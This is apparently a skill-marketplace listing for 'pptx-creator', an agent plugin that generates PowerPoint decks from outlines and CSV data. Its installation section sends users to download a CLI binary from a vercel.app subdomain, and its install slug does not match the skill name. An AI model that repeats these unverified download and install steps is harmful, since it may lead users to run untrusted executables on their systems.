pptx-creator
Create professional PowerPoint presentations from outlines, data sources, or AI-generated content. Supports custom templates, style presets, charts/tables from data, and AI-generated images. Use when asked to create slides, pitch decks, reports, or presentations.
Why use this skill?
Automate your slide deck creation with the pptx-creator skill. Build professional PowerPoint presentations from markdown, JSON, and data sources effortlessly.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/pptx-creatordWhat This Skill Does
The pptx-creator skill is a robust automation tool designed to streamline the creation of professional PowerPoint presentations. By leveraging the OpenClawCLI, this skill allows users to transform raw Markdown outlines, JSON configurations, or simple topic prompts into fully formatted slide decks. It includes built-in styling for various business contexts, such as corporate, startup, or executive themes, while supporting dynamic elements like CSV-sourced charts, tables, and AI-generated imagery. It serves as an end-to-end bridge between data and visual storytelling.
Installation
Before you begin, ensure you have the OpenClawCLI installed. Visit https://openclawcli.vercel.app/ to download the version specific to your OS. Once installed, you can integrate this skill into your environment using the command: clawhub install openclaw/skills/skills/thiagoruss0/pptx-creatord. Ensure you have the uv environment manager installed to execute the provided scripts efficiently.
Use Cases
This skill is perfect for professionals who need to produce recurring reports, pitch decks, or academic presentations. Use it to:
- Automate Q4 sales reviews or monthly performance reporting using data exported to CSV.
- Quickly draft internal presentations from structured meeting notes or markdown documents.
- Standardize branding across an entire organization by building custom templates from existing branded PPTX files.
- Generate engaging slide backgrounds and content imagery using AI-assisted prompt generation during the build process.
Example Prompts
- "Create a 10-slide pitch deck for our new software launch. Use the 'startup' template and include a bar chart based on the data in 'market_data.csv'."
- "Draft a Q4 financial summary presentation. Use the 'corporate' template. I've attached my notes in a markdown file named 'outline.md'."
- "Convert my 'Annual_Review.json' file into a presentation with the 'executive' theme. Please generate images for the team slides."
Tips & Limitations
To get the best results, ensure your data files (CSV) are clean and correctly formatted for chart generation. When using AI image generation, be specific with your descriptions (e.g., 'minimalist' or 'professional') to ensure visual consistency. Note that while the tool is excellent for structure and content, complex, highly custom slide designs requiring non-standard animation paths may still require manual polish within PowerPoint after generation. Always verify your output with a test run using the --list-templates flag to ensure the selected theme meets your branding requirements.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-pptx-creatord": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, file-read, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).